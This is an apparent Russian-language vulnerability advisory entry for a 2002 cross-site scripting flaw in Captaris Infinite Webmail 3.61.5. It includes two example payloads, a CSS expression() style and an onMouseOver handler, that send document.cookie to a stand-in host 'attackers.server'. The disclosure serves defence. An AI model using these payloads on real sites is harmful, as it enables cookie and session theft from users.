Межсайтовый скриптинг в Captaris Infinite Webmail

Дата публикации:23.12.2002
Всего просмотров:758
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Captaris Infinite Webmail уязвим к межсайтовому скриптингу. Уязвимость связанна с недостаточной фильтрацией Javasript кода внутри безопасных HTML тэгов. Уязвимость может использоваться для кражи информации, хранящейся в куки. Пример:
<p style="left:expression(document.location= 
'http://attackers.server/cgi-bin/logger.cgi?' 
+document.cookie)"> 

Launch on mouse over: 
<b onMouseOver= "document.location= 
'http://attackers.server/cgi-bin/logger.cgi?' 
+document.cookie\">
уязвимость обнаружена в Captaris Infinite Webmail 3.61.5
Ссылки: Captaris (Infinite) WebMail XSS